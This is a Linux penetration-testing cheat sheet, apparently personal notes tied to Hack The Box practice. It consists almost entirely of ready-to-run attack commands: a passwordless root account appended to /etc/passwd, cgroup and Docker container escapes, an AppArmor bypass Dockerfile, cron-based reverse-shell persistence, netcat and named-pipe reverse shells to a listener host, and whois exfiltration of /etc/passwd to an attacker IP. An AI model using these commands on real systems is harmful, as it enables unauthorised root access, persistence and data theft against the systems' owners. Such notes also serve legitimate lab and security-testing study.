Linux
Adding password to writable passwd file
If /etc/passwd is writable, you can just add a passwordless root account by echoing an extra line to it, using root's UID and GID of 0.
echo brigzzy::0:0:brigzzy:/root:/bin/bash >> /etc/passwd
su - brigzzy drops you straight to root
Bash Portscanner
for p in {1..65335}; do(echo >/dev/tcp/10.0.2.3/$p) >/dev/null 2>&1 && echo "$p open"; done
Connect to an SMB Share
smbclient //192.168.99.23/Private -I 192.168.99.23 -N
Container Escape
Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature:
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
Persistence on a Box via Cron
One liner to add persistence on a box via cron
echo "* * * * * /bin/nc 192.168.99.24 1234 -e /bin/bash" > cron && crontab cron
OR
echo "* * * * * mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.99.24 1234 1>/tmp/backpipe" > cron && crontab cron
and on 192.168.99.24
nc -lvp 1234
Docker Apparmor Bypass
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions
CMD YOUR_CMD
Docker Container Escape
If your account is a member of the docker group, you can download the docker binary, even if it's not installed in your container/in your path.
From there you can run a container in the container, mount the root filesystem, and you've got root on the host!
./docker run -it -v /:/home/ ubuntu bash
Exfiltrate data with Whois
Have limited ways to exfiltrate data? Use Whois!
attacker: nc -lvp 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
Find files with suid set
find / -perm -4000 2>/dev/null
Host quick web server to copy files (with PHP)
php -S 192.168.99.4:3000
then you can
wget http://192.168.99.4:3000/somefile.py
Netcat Portscanner
nc -zvvvn 10.0.2.5 1-65535 2>&1 | tee scan.txt
netcat reverse shell
Listener: nc -lvp 4444
Connector: nc 192.168.99.24 4444 -e /bin/bash
OR:
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.99.14 4444 > /tmp/f
then you can upgrade your shell like this:
python: python -c 'import pty;pty.spawn("/bin/bash")'
python3: python3 -c 'import pty; pty.spawn("/bin/bash")'
Then on either: export SHELL=bash && export TERM=screen && reset
OR:
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Aogiri:/var/www/html$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/ghoul# stty raw -echo
root@kali:~/Desktop/HTB/boxes/ghoul# nc -lvnp 1337
www-data@Aogiri:/var/www/html$ export TERM=screen
www-data@Aogiri:/var/www/html$
OR (no -e support):
Listener: nc -nvlp 1234
Connector: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.99.24 1234 1>/tmp/backpipe
Spawn Bash Shell via Python
python -c 'import pty; pty.spawn("/bin/bash")'